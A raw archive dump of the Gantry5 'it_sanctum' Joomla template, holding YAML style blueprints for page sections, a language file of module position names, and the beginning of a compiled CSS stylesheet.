    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!+e$d""(it_sanctum/blueprints/styles/accent.yamlnu&1i�name: Accent Colors
description: Accent colors for the Sanctum theme
type: core

form:
  fields:

    color-1:
      type: input.colorpicker
      label: Accent Color 1
      default: "#c91f37"
    color-2:
      type: input.colorpicker
      label: Accent Color 2
      default: "#282828"
PK!A��'''it_sanctum/blueprints/styles/intro.yamlnu&1i�name: Intro Styles
description: Intro styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#f7f7f7"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!?���))(it_sanctum/blueprints/styles/header.yamlnu&1i�name: Header Styles
description: Header styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!�V�G//+it_sanctum/blueprints/styles/fullwidth.yamlnu&1i�name: Fullwidth Styles
description: Fullwidth styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#f7f7f7"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!
��***it_sanctum/blueprints/styles/showcase.yamlnu&1i�name: Showcase Styles
description: Showcase styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!��|O+it_sanctum/blueprints/styles/fontsizes.yamlnu&1i�name: Font Sizes
description: Set font sizes for different elements.
type: core

form:
  fields:

    body-font-size:
      type: input.text
      label: Body Font Size
      description: Specify the default <body> font size in rem, em or px units.
      default: "0.9rem"
      pattern: '\d+(\.\d+){0,1}(rem|em|px)'
    menu-font-size:
      type: input.text
      label: Menu Font Size
      description: Specify the default Menu font size in rem, em or px units.
      default: "1rem"
      pattern: '\d+(\.\d+){0,1}(rem|em|px)'PK!t᥇II-it_sanctum/blueprints/styles/breakpoints.yamlnu&1i�name: Breakpoints
description: Breakpoint container sizes for different viewports
type: configuration

form:
  fields:

    large-desktop-container:
      type: input.text
      label: Large Desktop
      description: Set breakpoint size in rem, em, or px unit values
      default: "75rem"
      pattern: '\d+(\.\d+){0,1}(rem|em|ex|ch|vw|vh|vmin|vmax|%|px|cm|mm|in|pt|pc)'
    desktop-container:
      type: input.text
      label: Desktop
      description: Set breakpoint size in rem, em, or px unit values
      default: "60rem"
      pattern: '\d+(\.\d+){0,1}(rem|em|ex|ch|vw|vh|vmin|vmax|%|px|cm|mm|in|pt|pc)'
    tablet-container:
      type: input.text
      label: Tablet
      description: Set breakpoint size in rem, em, or px unit values
      default: "48rem"
      pattern: '\d+(\.\d+){0,1}(rem|em|ex|ch|vw|vh|vmin|vmax|%|px|cm|mm|in|pt|pc)'
    large-mobile-container:
      type: input.text
      label: Mobile
      description: Set breakpoint size in rem, em, or px unit values
      default: "30rem"
      pattern: '\d+(\.\d+){0,1}(rem|em|ex|ch|vw|vh|vmin|vmax|%|px|cm|mm|in|pt|pc)'
    mobile-menu-breakpoint:
      type: input.text
      label: Mobile Menu
      description: Set breakpoint size in rem, em, or px unit values
      default: "48rem"
      pattern: '\d+(\.\d+){0,1}(rem|em|ex|ch|vw|vh|vmin|vmax|%|px|cm|mm|in|pt|pc)'
PK!/�!���+it_sanctum/blueprints/styles/offcanvas.yamlnu&1i�name: Offcanvas Section
description: Paramters for the Off Canvas sidepanel section.
type: section

form:
  fields:

    background:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    width:
      type: input.text
      label: Panel Width
      description: Set offcanvas size in rem, em, px, or percentage unit values
      default: "17rem"
      pattern: '\d+(\.\d+){0,1}(rem|em|ex|ch|vw|vh|vmin|vmax|%|px|cm|mm|in|pt|pc)'
    toggle-color:
      type: input.colorpicker
      label: Toggle Color
      default: "#959595"
    toggle-position:
      type: select.select
      label: Toggle Position.
      default: left
      options:
        left: Left
        right: Right
    overlay:
      type: input.colorpicker
      label: Overlay
      description: Set the color of the page overlay when the certain menu modes are active.
      default: "rgba(0, 0, 0, 0.6)"
PK!�z&T'''it_sanctum/blueprints/styles/aside.yamlnu&1i�name: Aside Styles
description: Aside styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!��1�11,it_sanctum/blueprints/styles/additional.yamlnu&1i�name: Additional Styles
description: Additional styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#f7f7f7"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!�N�))(it_sanctum/blueprints/styles/drawer.yamlnu&1i�name: Drawer Styles
description: Drawer styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!{��//+it_sanctum/blueprints/styles/prebottom.yamlnu&1i�name: Prebottom Styles
description: Prebottom styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!��33-it_sanctum/blueprints/styles/afterbottom.yamlnu&1i�name: Afterbottom Styles
description: Afterbottom styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!%Y++)it_sanctum/blueprints/styles/maintop.yamlnu&1i�name: Maintop Styles
description: Maintop styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#f7f7f7"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!5mS�--*it_sanctum/blueprints/styles/mainbody.yamlnu&1i�name: Mainbody Styles
description: Mainbody styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!��E�11,it_sanctum/blueprints/styles/mainbottom.yamlnu&1i�name: Mainbottom Styles
description: Mainbottom styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#f7f7f7"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!'9�;;0it_sanctum/blueprints/styles/systemmessages.yamlnu&1i�name: System Messages Styles
description: System Messages styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!a��CC(it_sanctum/blueprints/styles/footer.yamlnu&1i�name: Footer Styles
description: Footer styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#282828"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: "gantry-media://footer.jpg"
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: cover
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#6f6f6f"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#ffffff"PK!]`��11,it_sanctum/blueprints/styles/navigation.yamlnu&1i�name: Navigation Styles
description: Navigation styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#959595"PK!M=�//+it_sanctum/blueprints/styles/copyright.yamlnu&1i�name: Copyright Styles
description: Copyright styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#959595"PK!��ō�'it_sanctum/blueprints/styles/fonts.yamlnu&1i�name: Font Families
description: Font families for the InspireTheme theme
type: core

form:
  fields:

    body-font:
      type: input.fonts
      label: Body Font
      default: 'family=Lato'
    heading-font:
      type: input.fonts
      label: Heading Font
      default: 'family=Cormorant+SC'
    menu-font:
      type: input.fonts
      label: Menu Font
      default: 'family=Cormorant+SC'PK!���==&it_sanctum/blueprints/styles/last.yamlnu&1i�name: Last Styles
description: Last styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: "gantry-media://doves.png"
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!�(gq##%it_sanctum/blueprints/styles/top.yamlnu&1i�name: Top Styles
description: Top styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#ffffff"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!E��11,it_sanctum/blueprints/styles/subfeature.yamlnu&1i�name: Subfeature Styles
description: Subfeature styles for the Sanctum theme
type: section

form:
  fields:

    background-color:
      type: input.colorpicker
      label: Background Color
      default: "#f7f7f7"
    background-image:
      type: input.imagepicker
      label: Background Image
      default: ""
    background-repeat:
      type: select.select
      label: Background Repeat
      default: no-repeat
      options:
        no-repeat: No Repeat
        repeat: Repeat
        repeat-x: Repeat-x
        repeat-y: Repeat-y
    background-size:
      type: select.select
      label: Background Size
      default: auto
      options:
        auto: Auto
        100%: 100%
        cover: Cover
    background-attachment:
      type: select.select
      label: Background Attach.
      default: scroll
      options:
        scroll: Scroll
        fixed: Fixed
    text-color:
      type: input.colorpicker
      label: Text Color
      default: "#959595"
    heading-color:
      type: input.colorpicker
      label: Heading Color
      default: "#282828"PK!�
�CFFCit_sanctum/custom/language/en-GB/en-GB.tpl_it_sanctum_positions.ininu&1i�TPL_IT_SANCTUM_POSITION_DRAWER="Drawer"
TPL_IT_SANCTUM_POSITION_TOP-A="Top-a"
TPL_IT_SANCTUM_POSITION_TOP-B="Top-b"
TPL_IT_SANCTUM_POSITION_TOP-C="Top-c"
TPL_IT_SANCTUM_POSITION_TOP-D="Top-d"
TPL_IT_SANCTUM_POSITION_HEADER-A="Header-a"
TPL_IT_SANCTUM_POSITION_HEADER-B="Header-b"
TPL_IT_SANCTUM_POSITION_BREADCRUMB-A="Breadcrumb-a"
TPL_IT_SANCTUM_POSITION_BREADCRUMB-B="Breadcrumb-b"
TPL_IT_SANCTUM_POSITION_BREADCRUMB-C="Breadcrumb-c"
TPL_IT_SANCTUM_POSITION_BREADCRUMB-D="Breadcrumb-d"
TPL_IT_SANCTUM_POSITION_FULLWIDTH="Fullwidth"
TPL_IT_SANCTUM_POSITION_SHOWCASE-A="Showcase-a"
TPL_IT_SANCTUM_POSITION_SHOWCASE-B="Showcase-b"
TPL_IT_SANCTUM_POSITION_SHOWCASE-C="Showcase-c"
TPL_IT_SANCTUM_POSITION_SHOWCASE-D="Showcase-d"
TPL_IT_SANCTUM_POSITION_INTRO-A="Intro-a"
TPL_IT_SANCTUM_POSITION_INTRO-B="Intro-b"
TPL_IT_SANCTUM_POSITION_INTRO-C="Intro-c"
TPL_IT_SANCTUM_POSITION_INTRO-D="Intro-d"
TPL_IT_SANCTUM_POSITION_FEATURE-A="Feature-a"
TPL_IT_SANCTUM_POSITION_FEATURE-B="Feature-b"
TPL_IT_SANCTUM_POSITION_FEATURE-C="Feature-c"
TPL_IT_SANCTUM_POSITION_FEATURE-D="Feature-d"
TPL_IT_SANCTUM_POSITION_SUBFEATURE-A="Subfeature-a"
TPL_IT_SANCTUM_POSITION_SUBFEATURE-B="Subfeature-b"
TPL_IT_SANCTUM_POSITION_SUBFEATURE-C="Subfeature-c"
TPL_IT_SANCTUM_POSITION_SUBFEATURE-D="Subfeature-d"
TPL_IT_SANCTUM_POSITION_UTILITY-A="Utility-a"
TPL_IT_SANCTUM_POSITION_UTILITY-B="Utility-b"
TPL_IT_SANCTUM_POSITION_UTILITY-C="Utility-c"
TPL_IT_SANCTUM_POSITION_UTILITY-D="Utility-d"
TPL_IT_SANCTUM_POSITION_MAINTOP-A="Maintop-a"
TPL_IT_SANCTUM_POSITION_MAINTOP-B="Maintop-b"
TPL_IT_SANCTUM_POSITION_MAINTOP-C="Maintop-c"
TPL_IT_SANCTUM_POSITION_MAINTOP-D="Maintop-d"
TPL_IT_SANCTUM_POSITION_SIDEBAR-LEFT="Sidebar-left"
TPL_IT_SANCTUM_POSITION_CONTENT-TOP-A="Content-top-a"
TPL_IT_SANCTUM_POSITION_CONTENT-TOP-B="Content-top-b"
TPL_IT_SANCTUM_POSITION_CONTENT-BOTTOM-A="Content-bottom-a"
TPL_IT_SANCTUM_POSITION_CONTENT-BOTTOM-B="Content-bottom-b"
TPL_IT_SANCTUM_POSITION_SIDEBAR-RIGHT="Sidebar-right"
TPL_IT_SANCTUM_POSITION_MAINBOTTOM-A="Mainbottom-a"
TPL_IT_SANCTUM_POSITION_MAINBOTTOM-B="Mainbottom-b"
TPL_IT_SANCTUM_POSITION_MAINBOTTOM-C="Mainbottom-c"
TPL_IT_SANCTUM_POSITION_MAINBOTTOM-D="Mainbottom-d"
TPL_IT_SANCTUM_POSITION_EXTENSION-A="Extension-a"
TPL_IT_SANCTUM_POSITION_EXTENSION-B="Extension-b"
TPL_IT_SANCTUM_POSITION_EXTENSION-C="Extension-c"
TPL_IT_SANCTUM_POSITION_EXTENSION-D="Extension-d"
TPL_IT_SANCTUM_POSITION_ADDITIONAL-A="Additional-a"
TPL_IT_SANCTUM_POSITION_ADDITIONAL-B="Additional-b"
TPL_IT_SANCTUM_POSITION_ADDITIONAL-C="Additional-c"
TPL_IT_SANCTUM_POSITION_ADDITIONAL-D="Additional-d"
TPL_IT_SANCTUM_POSITION_PREBOTTOM-A="Prebottom-a"
TPL_IT_SANCTUM_POSITION_PREBOTTOM-B="Prebottom-b"
TPL_IT_SANCTUM_POSITION_PREBOTTOM-C="Prebottom-c"
TPL_IT_SANCTUM_POSITION_PREBOTTOM-D="Prebottom-d"
TPL_IT_SANCTUM_POSITION_BOTTOM-A="Bottom-a"
TPL_IT_SANCTUM_POSITION_BOTTOM-B="Bottom-b"
TPL_IT_SANCTUM_POSITION_BOTTOM-C="Bottom-c"
TPL_IT_SANCTUM_POSITION_BOTTOM-D="Bottom-d"
TPL_IT_SANCTUM_POSITION_AFTERBOTTOM-A="Afterbottom-a"
TPL_IT_SANCTUM_POSITION_AFTERBOTTOM-B="Afterbottom-b"
TPL_IT_SANCTUM_POSITION_AFTERBOTTOM-C="Afterbottom-c"
TPL_IT_SANCTUM_POSITION_AFTERBOTTOM-D="Afterbottom-d"
TPL_IT_SANCTUM_POSITION_LAST-A="Last-a"
TPL_IT_SANCTUM_POSITION_LAST-B="Last-b"
TPL_IT_SANCTUM_POSITION_LAST-C="Last-c"
TPL_IT_SANCTUM_POSITION_LAST-D="Last-d"
TPL_IT_SANCTUM_POSITION_FOOTER-A="Footer-a"
TPL_IT_SANCTUM_POSITION_FOOTER-B="Footer-b"
TPL_IT_SANCTUM_POSITION_FOOTER-C="Footer-c"
TPL_IT_SANCTUM_POSITION_FOOTER-D="Footer-d"
TPL_IT_SANCTUM_POSITION_COPYRIGHT-A="Copyright-a"
TPL_IT_SANCTUM_POSITION_COPYRIGHT-B="Copyright-b"
TPL_IT_SANCTUM_POSITION_COPYRIGHT-C="Copyright-c"
TPL_IT_SANCTUM_POSITION_COPYRIGHT-D="Copyright-d"
TPL_IT_SANCTUM_POSITION_OFFCANVAS-A="Offcanvas-a"
TPL_IT_SANCTUM_POSITION_OFFCANVAS-B="Offcanvas-b"
TPL_IT_SANCTUM_POSITION_FOOTER="Footer"
TPL_IT_SANCTUM_POSITION_DEBUG="Debug"
PK!���ŋ���*it_sanctum/custom/css-compiled/sanctum.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.

   WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!

   For more information on modifying CSS, please read:

   http://docs.gantry.org/gantry5/configure/styles
   http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

@import url('//fonts.googleapis.com/css?family=Lato');
@import url('//fonts.googleapis.com/css?family=Cormorant+SC');
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/mixins/_nav.scss */
/* line 12, media/gantry5/engines/nucleus/scss/nucleus/mixins/_nav.scss */
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/mixins/_utilities.scss */
/* line 9, media/gantry5/engines/nucleus/scss/nucleus/mixins/_utilities.scss */
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/_flex.scss */
.g-content {
  margin: 0.625rem;
  padding: 0.938rem;
}
/* line 6, media/gantry5/engines/nucleus/scss/nucleus/theme/_flex.scss */
.g-flushed .g-content {
  margin: 0;
  padding: 0;
}
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
body {
  font-size: 1rem;
  line-height: 1.5;
}
/* line 8, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h1 {
  font-size: 2.7rem;
}
/* line 12, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h2 {
  font-size: 2.07rem;
}
/* line 16, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h3 {
  font-size: 1.8rem;
}
/* line 20, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h4 {
  font-size: 1.35rem;
}
/* line 24, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h5 {
  font-size: 0.9rem;
}
/* line 28, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h6 {
  font-size: 0.81rem;
}
/* line 33, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
small {
  font-size: 0.875rem;
}
/* line 37, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
cite {
  font-size: 0.875rem;
}
/* line 41, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
sub, sup {
  font-size: 0.75rem;
}
/* line 46, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
code, kbd, pre, samp {
  font-size: 1rem;
  font-family: "Menlo", "Monaco", monospace;
}
/* line 1, media/gantry5/engines/nucleus/scss/nucleus/theme/_forms.scss */
textarea, select[multiple=multiple], input[type="color"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"], input:not([type]) {
  border-radius: 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_core.scss */
body, #g-page-surround {
  color: #959595;
  background-color: #fff;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
/* line 14, templates/it_sanctum/scss/sanctum/_core.scss */
#g-page-surround {
  box-shadow: 0 0 15px rgba(0, 0, 0, 0.4);
}
@media print {
  /* line 19, templates/it_sanctum/scss/sanctum/_core.scss */
  #g-page-surround {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 25, templates/it_sanctum/scss/sanctum/_core.scss */
a {
  color: #4f953b;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 28, templates/it_sanctum/scss/sanctum/_core.scss */
a:hover {
  color: #325e25;
}
/* line 33, templates/it_sanctum/scss/sanctum/_core.scss */
h1, h2, h3, h4, h5, h6, strong {
  color: #282828;
}
/* line 37, templates/it_sanctum/scss/sanctum/_core.scss */
.button {
  display: inline-block;
  padding: 0.5rem 1rem;
  border-radius: 0;
  background: #4f953b;
  color: #fff;
  border: 1px solid #4f953b;
  line-height: 1.5;
  font-size: 0.9rem;
  vertical-align: middle;
  text-shadow: none;
  box-shadow: none;
  text-align: center;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 51, templates/it_sanctum/scss/sanctum/_core.scss */
.button:hover {
  color: #fff;
  background: #40782f;
}
/* line 55, templates/it_sanctum/scss/sanctum/_core.scss */
.button:active, .button:focus {
  color: #fff;
  background: #437f32;
}
/* line 59, templates/it_sanctum/scss/sanctum/_core.scss */
.button.dark {
  background: #282828;
